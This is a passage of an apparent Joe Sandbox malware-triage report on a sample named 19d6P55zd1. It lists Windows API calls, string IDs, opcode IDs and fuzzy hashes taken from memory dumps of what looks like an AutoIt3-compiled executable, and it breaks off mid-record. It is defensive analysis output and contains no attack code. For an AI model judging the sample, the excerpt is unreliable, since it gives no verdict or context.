                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2833360925-0
                                                                                                                    • Opcode ID: 7f8efcd88a38f12b9334a68df4ef3e9fa673833735de85120c3cb89d77f0793d
                                                                                                                    • Instruction ID: 04f45aa7b0513f93b60ba46b51157894885635eb8c7fecdc91c1904304410cb6
                                                                                                                    • Opcode Fuzzy Hash: 7f8efcd88a38f12b9334a68df4ef3e9fa673833735de85120c3cb89d77f0793d
                                                                                                                    • Instruction Fuzzy Hash: 15011735D01A29DBCF02EFE4E849AEDBB7CBB0A711F4109A6E981F2140CF3059548BA1
                                                                                                                    APIs
                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00378121
                                                                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0037812B
                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0037813A
                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00378141
                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00378157
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 44706859-0
                                                                                                                    • Opcode ID: 6e9655673bc66de32f5f1d644c431abe7a04d40d06b931ada12e99edbf9b13fa
                                                                                                                    • Instruction ID: 2725b2a6cf6bc09645d94e5b28ab5c7cde207dc0aad7ead3e5aa75c067063562
                                                                                                                    • Opcode Fuzzy Hash: 6e9655673bc66de32f5f1d644c431abe7a04d40d06b931ada12e99edbf9b13fa
                                                                                                                    • Instruction Fuzzy Hash: 79F04F75340304AFEB220FA5EC8CF673BACEF4A755F414035F949C6150CF659941DA60
                                                                                                                    APIs
                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0037C1F7
                                                                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 0037C20E
                                                                                                                    • MessageBeep.USER32(00000000), ref: 0037C226
                                                                                                                    • KillTimer.USER32(?,0000040A), ref: 0037C242
                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0037C25C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3741023627-0
                                                                                                                    • Opcode ID: c1172e8e75f7a5b72bd02015193c9deb7a63e293aa1f477b5126f9fe8296eec7
                                                                                                                    • Instruction ID: a9fe5ddf23db3628bc4c1b902b80c82243b5ea6085fee0b0d264e6085d245a91
                                                                                                                    • Opcode Fuzzy Hash: c1172e8e75f7a5b72bd02015193c9deb7a63e293aa1f477b5126f9fe8296eec7
                                                                                                                    • Instruction Fuzzy Hash: 3E01A730414304ABEB325B90ED4EB96777CBB01706F00466DE586A14F1DBE469448B50
                                                                                                                    APIs
                                                                                                                    • EndPath.GDI32(?), ref: 003213BF
                                                                                                                    • StrokeAndFillPath.GDI32(?,?,0035B888,00000000,?), ref: 003213DB
                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 003213EE
                                                                                                                    • DeleteObject.GDI32 ref: 00321401
                                                                                                                    • StrokePath.GDI32(?), ref: 0032141C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2625713937-0
                                                                                                                    • Opcode ID: 01f2c9fc1624f30b8569b7d52ab0c3f4b80f15778c2831362447398726fba294
                                                                                                                    • Instruction ID: 3850433d5a58c82b2d6ca5a4c1f6fcd24c4fba545056cabd1762387c1cea6943
                                                                                                                    • Opcode Fuzzy Hash: 01f2c9fc1624f30b8569b7d52ab0c3f4b80f15778c2831362447398726fba294
                                                                                                                    • Instruction Fuzzy Hash: 49F01930101A4CEFDB279F66ED8C7583BADAB1132AF088324E569880F1C7704995DF50
                                                                                                                    APIs
                                                                                                                    • CoInitialize.OLE32(00000000), ref: 0038C432
                                                                                                                    • CoCreateInstance.OLE32(003B2D6C,00000000,00000001,003B2BDC,?), ref: 0038C44A
                                                                                                                      • Part of subcall function 00327DE1: _memmove.LIBCMT ref: 00327E22
                                                                                                                    • CoUninitialize.OLE32 ref: 0038C6B7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                    • String ID: .lnk
                                                                                                                    • API String ID: 2683427295-24824748
                                                                                                                    • Opcode ID: a395c57aa355080b965f98304f320f587527f6f5359f191f07283bc4197c9772
                                                                                                                    • Instruction ID: 0f53aba3c5c234729a45de8b7d443f1e9952e21dbfa9aea5381bf5b32a949fda
                                                                                                                    • Opcode Fuzzy Hash: a395c57aa355080b965f98304f320f587527f6f5359f191f07283bc4197c9772
                                                                                                                    • Instruction Fuzzy Hash: 9DA14971104205AFD301EF64D881EABB7ECFF89354F00496DF5558B1A2EB71EA49CBA2
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00340DB6: std::exception::exception.LIBCMT ref: 00340DEC
                                                                                                                      • Part of subcall function 00340DB6: __CxxThrowException@8.LIBCMT ref: 00340E01
                                                                                                                      • Part of subcall function 00327DE1: _memmove.LIBCMT ref: 00327E22
                                                                                                                      • Part of subcall function 00327A51: _memmove.LIBCMT ref: 00327AAB
                                                                                                                    • __swprintf.LIBCMT ref: 00332ECD
                                                                                                                    Strings
                                                                                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00332D66
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                    • API String ID: 1943609520-557222456
                                                                                                                    • Opcode ID: 3d532fe5c78e95f63430e943bdae207d89bb1fe17317161f58cd02a0690ca378
                                                                                                                    • Instruction ID: 5adabe07776d755ff829ccc345e145c80b3406ccec86635a23c5ea7f55ba5744
                                                                                                                    • Opcode Fuzzy Hash: 3d532fe5c78e95f63430e943bdae207d89bb1fe17317161f58cd02a0690ca378
                                                                                                                    • Instruction Fuzzy Hash: 4F9157711082119FCB16EF28D896C6FB7A8EF85750F01491DF9969F2A1EB30EE44CB52
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00324750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00324743,?,?,003237AE,?), ref: 00324770
                                                                                                                    • CoInitialize.OLE32(00000000), ref: 0038B9BB
                                                                                                                    • CoCreateInstance.OLE32(003B2D6C,00000000,00000001,003B2BDC,?), ref: 0038B9D4
                                                                                                                    • CoUninitialize.OLE32 ref: 0038B9F1
                                                                                                                      • Part of subcall function 00329837: __itow.LIBCMT ref: 00329862
                                                                                                                      • Part of subcall function 00329837: __swprintf.LIBCMT ref: 003298AC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                    • String ID: .lnk
                                                                                                                    • API String ID: 2126378814-24824748
                                                                                                                    • Opcode ID: f7b979aa7663f1f3c10017d2eecb94c140a9a7a562d8d05abd84052de9a07682
                                                                                                                    • Instruction ID: d428311f3dd2bc7277ce09cdd8c0bb2c8c479c44cd14d2b0b043b050f7ea4d28
                                                                                                                    • Opcode Fuzzy Hash: f7b979aa7663f1f3c10017d2eecb94c140a9a7a562d8d05abd84052de9a07682
                                                                                                                    • Instruction Fuzzy Hash: 25A19A756043129FCB06EF14C484E6ABBE5FF89314F058989F8999B3A1CB31ED45CB91
                                                                                                                    APIs
                                                                                                                    • OleSetContainedObject.OLE32(?,00000001), ref: 0037B4BE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ContainedObject
                                                                                                                    • String ID: AutoIt3GUI$Container$%;
                                                                                                                    • API String ID: 3565006973-1131028850
                                                                                                                    • Opcode ID: 93c1e0f1a51e8638f50d37f130d687ed850fb4cfcfbeab1cf09eaecbe8ddac76
                                                                                                                    • Instruction ID: e9c9e11960436d6fa91b585b9b176d32ac5c37984113f3ca56561ba1151a6a24
                                                                                                                    • Opcode Fuzzy Hash: 93c1e0f1a51e8638f50d37f130d687ed850fb4cfcfbeab1cf09eaecbe8ddac76
                                                                                                                    • Instruction Fuzzy Hash: 32915774600601AFDB25CF64C884B6ABBF9FF49710F20856EF94ACB6A1DB74E841CB50
                                                                                                                    APIs
                                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 003450AD
                                                                                                                      • Part of subcall function 003500F0: __87except.LIBCMT ref: 0035012B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorHandling__87except__start
                                                                                                                    • String ID: pow
                                                                                                                    • API String ID: 2905807303-2276729525
                                                                                                                    • Opcode ID: 20cf121e83c1f7da07df2166dac289fa03612829ca9f9c569be2e70541838471
                                                                                                                    • Instruction ID: 546f41442f05fa779cfa83d9e111e94c42d41a7a35c2444a60dfa798ca04fc0a
                                                                                                                    • Opcode Fuzzy Hash: 20cf121e83c1f7da07df2166dac289fa03612829ca9f9c569be2e70541838471
                                                                                                                    • Instruction Fuzzy Hash: EB515A65D08A0187DB1B6B24C94177E2FD8DB40701F208D59E8D58E2FBDF369ACC9A86
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove
                                                                                                                    • String ID: 3c3$_3
                                                                                                                    • API String ID: 4104443479-176681986
                                                                                                                    • Opcode ID: 2b9c9758c9e5b3ccce3728aee3bce3484c89275494b5a5e00127d864462a227f
                                                                                                                    • Instruction ID: ed5d4625f9d9ce88d4d4b85745fd80867c60992f91f0bbe6b37c9ac4611141cd
                                                                                                                    • Opcode Fuzzy Hash: 2b9c9758c9e5b3ccce3728aee3bce3484c89275494b5a5e00127d864462a227f
                                                                                                                    • Instruction Fuzzy Hash: FC517E70E006099FCF26CF68C880AAEB7F5FF45304F158529E95ADB254EB30B995CB51
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 003814BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00379296,?,?,00000034,00000800,?,00000034), ref: 003814E6
                                                                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0037983F
                                                                                                                      • Part of subcall function 00381487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003792C5,?,?,00000800,?,00001073,00000000,?,?), ref: 003814B1
                                                                                                                      • Part of subcall function 003813DE: GetWindowThreadProcessId.USER32(?,?), ref: 00381409
                                                                                                                      • Part of subcall function 003813DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0037925A,00000034,?,?,00001004,00000000,00000000), ref: 00381419
                                                                                                                      • Part of subcall function 003813DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0037925A,00000034,?,?,00001004,00000000,00000000), ref: 0038142F
                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003798AC
                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003798F9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 4150878124-2766056989
                                                                                                                    • Opcode ID: d7838dc91af3b844f1452e1c001a38af3a66b987e0d7f4faa12c2a685468915d
                                                                                                                    • Instruction ID: 1516a61d9a051dab220c44d94e6a7eca65e836853c8604b7bb6211a3b9d32166
                                                                                                                    • Opcode Fuzzy Hash: d7838dc91af3b844f1452e1c001a38af3a66b987e0d7f4faa12c2a685468915d
                                                                                                                    • Instruction Fuzzy Hash: 00414F76900218BFDB21EFA4CC81FDEBBB8EB09300F104199FA55B7191DA716E45CBA1
                                                                                                                    APIs
                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,003AF910,00000000,?,?,?,?), ref: 003A79DF
                                                                                                                    • GetWindowLongW.USER32 ref: 003A79FC
                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 003A7A0C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Long
                                                                                                                    • String ID: SysTreeView32
                                                                                                                    • API String ID: 847901565-1698111956
                                                                                                                    • Opcode ID: b8480e6793c91ed014345bdffb9ac585d4bc374ad5ed8dff734559dcf1ace820
                                                                                                                    • Instruction ID: 56cc3ee814fd2b7dab076e48949424e1393bcbdeda9530aa499ade567cc21d66
                                                                                                                    • Opcode Fuzzy Hash: b8480e6793c91ed014345bdffb9ac585d4bc374ad5ed8dff734559dcf1ace820
                                                                                                                    • Instruction Fuzzy Hash: 0731C331204605AFDB129E74DC85BEB77A9EF06324F214729F875932E0D731ED519B50
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 003A7461
                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 003A7475
                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 003A7499
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window
                                                                                                                    • String ID: SysMonthCal32
                                                                                                                    • API String ID: 2326795674-1439706946
                                                                                                                    • Opcode ID: 5186ac30bc090788b291382b67cdaf69255a3919d0812b025c73595654229cbc
                                                                                                                    • Instruction ID: 68efdbe3bdf749f71a241f49c3ae22b77ddedc7a70ac616a57d0cc946ae4e54e
                                                                                                                    • Opcode Fuzzy Hash: 5186ac30bc090788b291382b67cdaf69255a3919d0812b025c73595654229cbc
                                                                                                                    • Instruction Fuzzy Hash: 27219F32500218AFDF228EA5CC86FEA3B69EF4D724F120214FE156B1D0DA75AC519BA0
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 003A7C4A
                                                                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 003A7C58
                                                                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 003A7C5F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$DestroyWindow
                                                                                                                    • String ID: msctls_updown32
                                                                                                                    • API String ID: 4014797782-2298589950
                                                                                                                    • Opcode ID: d740da50e6d676060c71c16a3412599c287576144c02aaa57af3abecec8d0dfc
                                                                                                                    • Instruction ID: eb66aac7f8167de733f62dc3bba91b9fa05e8b4eed6e0eeeeb7af42b73d10ac9
                                                                                                                    • Opcode Fuzzy Hash: d740da50e6d676060c71c16a3412599c287576144c02aaa57af3abecec8d0dfc
                                                                                                                    • Instruction Fuzzy Hash: 52217CB5604208AFDB12DF24DCC1DA637EDEB5A3A4B150159F9019B3A1CB31EC118AA0
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 003A6D3B
                                                                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 003A6D4B
                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 003A6D70
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$MoveWindow
                                                                                                                    • String ID: Listbox
                                                                                                                    • API String ID: 3315199576-2633736733
                                                                                                                    • Opcode ID: d7e9dc010c8454e7d00abeb7ea9db723efe6f77319807cbddc24b48369828b48
                                                                                                                    • Instruction ID: 238f683188670884e012f48be839e21d3959ac13521faab4abc83c4d1782fc74
                                                                                                                    • Opcode Fuzzy Hash: d7e9dc010c8454e7d00abeb7ea9db723efe6f77319807cbddc24b48369828b48
                                                                                                                    • Instruction Fuzzy Hash: FD219232610118BFDF128F54DC46FBB3BBEEF8A760F058124FA459B1A0C6719C518BA0
                                                                                                                    APIs
                                                                                                                    • __snwprintf.LIBCMT ref: 00393A66
                                                                                                                      • Part of subcall function 00327DE1: _memmove.LIBCMT ref: 00327E22
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
